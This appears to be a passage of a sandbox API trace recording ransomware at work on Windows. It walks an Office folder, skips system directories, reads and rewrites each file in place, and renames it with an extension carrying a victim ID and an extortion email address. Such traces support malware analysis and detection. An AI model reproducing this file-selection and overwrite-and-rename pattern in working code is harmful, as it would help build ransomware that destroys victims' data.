[0140.946] lstrcmpiW (lpString1="DGBARBLL.XML", lpString2="windows") returned -1 [0140.946] lstrcmpiW (lpString1="DGBARBLL.XML", lpString2="recovery") returned -1 [0140.946] lstrcmpiW (lpString1="DGBARBLL.XML", lpString2="perflogs") returned -1 [0140.946] lstrcmpiW (lpString1="DGBARBLL.XML", lpString2="documents and settings") returned -1 [0140.946] lstrcmpiW (lpString1="DGBARBLL.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.946] lstrcmpiW (lpString1="DGBARBLL.XML", lpString2="system volume information") returned -1 [0140.946] lstrcmpiW (lpString1="DGBARBLL.XML", lpString2="msocache") returned -1 [0140.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBARBLL.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBARBLL.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBARBLL.XML", lpUsedDefaultChar=0x0) returned 12 [0140.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBARBLL.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBARBLL.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBARBLL.XML", lpUsedDefaultChar=0x0) returned 12 [0140.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBARBLL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgbarbll.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.947] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1110) returned 1 [0140.947] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.947] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x450, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x450, lpOverlapped=0x0) returned 1 [0140.948] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.948] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x450, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x450, lpOverlapped=0x0) returned 1 [0140.948] CloseHandle (hObject=0x238) returned 1 [0140.949] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBARBLL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgbarbll.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBARBLL.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgbarbll.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.950] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGBORDER.DPV", cAlternateFileName="")) returned 1 [0140.950] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2=".") returned 1 [0140.950] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="..") returned 1 [0140.950] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="...") returned 1 [0140.950] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="windows") returned -1 [0140.950] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="recovery") returned -1 [0140.950] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="perflogs") returned -1 [0140.950] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="documents and settings") returned -1 [0140.950] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.950] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="system volume information") returned -1 [0140.950] lstrcmpiW (lpString1="DGBORDER.DPV", lpString2="msocache") returned -1 [0140.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBORDER.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBORDER.DPV", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBORDER.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBORDER.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBORDER.DPV", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBORDER.DPV", lpUsedDefaultChar=0x0) returned 12 [0140.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBORDER.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgborder.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.951] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5632) returned 1 [0140.951] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.951] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1600, lpOverlapped=0x0) returned 1 [0140.952] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.953] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1600, lpOverlapped=0x0) returned 1 [0140.953] CloseHandle (hObject=0x238) returned 1 [0140.953] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBORDER.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgborder.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBORDER.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgborder.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.954] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc702687, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc702687, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9a4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGBORDER.XML", cAlternateFileName="")) returned 1 [0140.954] lstrcmpiW (lpString1="DGBORDER.XML", lpString2=".") returned 1 [0140.954] lstrcmpiW (lpString1="DGBORDER.XML", lpString2="..") returned 1 [0140.954] lstrcmpiW (lpString1="DGBORDER.XML", lpString2="...") returned 1 [0140.954] lstrcmpiW (lpString1="DGBORDER.XML", lpString2="windows") returned -1 [0140.954] lstrcmpiW (lpString1="DGBORDER.XML", lpString2="recovery") returned -1 [0140.954] lstrcmpiW (lpString1="DGBORDER.XML", lpString2="perflogs") returned -1 [0140.954] lstrcmpiW (lpString1="DGBORDER.XML", lpString2="documents and settings") returned -1 [0140.954] lstrcmpiW (lpString1="DGBORDER.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.954] lstrcmpiW (lpString1="DGBORDER.XML", lpString2="system volume information") returned -1 [0140.954] lstrcmpiW (lpString1="DGBORDER.XML", lpString2="msocache") returned -1 [0140.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBORDER.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBORDER.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBORDER.XML", lpUsedDefaultChar=0x0) returned 12 [0140.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBORDER.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBORDER.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBORDER.XML", lpUsedDefaultChar=0x0) returned 12 [0140.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBORDER.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgborder.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.955] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2468) returned 1 [0140.955] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.955] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9a0, lpOverlapped=0x0) returned 1 [0140.976] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.976] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9a0, lpOverlapped=0x0) returned 1 [0140.976] CloseHandle (hObject=0x238) returned 1 [0140.976] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBORDER.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgborder.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBORDER.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgborder.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.978] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGBOXES.DPV", cAlternateFileName="")) returned 1 [0140.978] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2=".") returned 1 [0140.978] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="..") returned 1 [0140.978] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="...") returned 1 [0140.978] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="windows") returned -1 [0140.978] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="recovery") returned -1 [0140.978] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="perflogs") returned -1 [0140.978] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="documents and settings") returned -1 [0140.978] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.978] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="system volume information") returned -1 [0140.978] lstrcmpiW (lpString1="DGBOXES.DPV", lpString2="msocache") returned -1 [0140.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBOXES.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBOXES.DPV", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBOXES.DPV", lpUsedDefaultChar=0x0) returned 11 [0140.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBOXES.DPV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBOXES.DPV", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBOXES.DPV", lpUsedDefaultChar=0x0) returned 11 [0140.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBOXES.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgboxes.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.979] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3072) returned 1 [0140.979] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.979] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc00, lpOverlapped=0x0) returned 1 [0140.981] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.981] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc00, lpOverlapped=0x0) returned 1 [0140.981] CloseHandle (hObject=0x238) returned 1 [0140.981] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBOXES.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgboxes.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBOXES.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgboxes.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.982] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21994fc3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGBOXES.XML", cAlternateFileName="")) returned 1 [0140.982] lstrcmpiW (lpString1="DGBOXES.XML", lpString2=".") returned 1 [0140.982] lstrcmpiW (lpString1="DGBOXES.XML", lpString2="..") returned 1 [0140.982] lstrcmpiW (lpString1="DGBOXES.XML", lpString2="...") returned 1 [0140.982] lstrcmpiW (lpString1="DGBOXES.XML", lpString2="windows") returned -1 [0140.982] lstrcmpiW (lpString1="DGBOXES.XML", lpString2="recovery") returned -1 [0140.982] lstrcmpiW (lpString1="DGBOXES.XML", lpString2="perflogs") returned -1 [0140.982] lstrcmpiW (lpString1="DGBOXES.XML", lpString2="documents and settings") returned -1 [0140.982] lstrcmpiW (lpString1="DGBOXES.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.982] lstrcmpiW (lpString1="DGBOXES.XML", lpString2="system volume information") returned -1 [0140.982] lstrcmpiW (lpString1="DGBOXES.XML", lpString2="msocache") returned -1 [0140.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBOXES.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBOXES.XML", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBOXES.XML", lpUsedDefaultChar=0x0) returned 11 [0140.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBOXES.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0140.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGBOXES.XML", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGBOXES.XML", lpUsedDefaultChar=0x0) returned 11 [0140.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBOXES.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgboxes.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.983] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=542) returned 1 [0140.983] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.984] ReadFile (in: hFile=0x238, lpBuffer=0x231078, nNumberOfBytesToRead=0x210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x231078*, lpNumberOfBytesRead=0x345e89c*=0x210, lpOverlapped=0x0) returned 1 [0140.985] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.985] WriteFile (in: hFile=0x238, lpBuffer=0x231078*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x231078*, lpNumberOfBytesWritten=0x345e898*=0x210, lpOverlapped=0x0) returned 1 [0140.985] CloseHandle (hObject=0x238) returned 1 [0140.985] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBOXES.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgboxes.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGBOXES.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgboxes.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.987] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x35468, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGCAL.DPV", cAlternateFileName="")) returned 1 [0140.987] lstrcmpiW (lpString1="DGCAL.DPV", lpString2=".") returned 1 [0140.987] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="..") returned 1 [0140.987] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="...") returned 1 [0140.987] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="windows") returned -1 [0140.987] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="recovery") returned -1 [0140.987] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="perflogs") returned -1 [0140.987] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="documents and settings") returned -1 [0140.987] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.987] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="system volume information") returned -1 [0140.987] lstrcmpiW (lpString1="DGCAL.DPV", lpString2="msocache") returned -1 [0140.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCAL.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0140.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCAL.DPV", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCAL.DPV", lpUsedDefaultChar=0x0) returned 9 [0140.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCAL.DPV", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0140.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGCAL.DPV", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGCAL.DPV", lpUsedDefaultChar=0x0) returned 9 [0140.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, 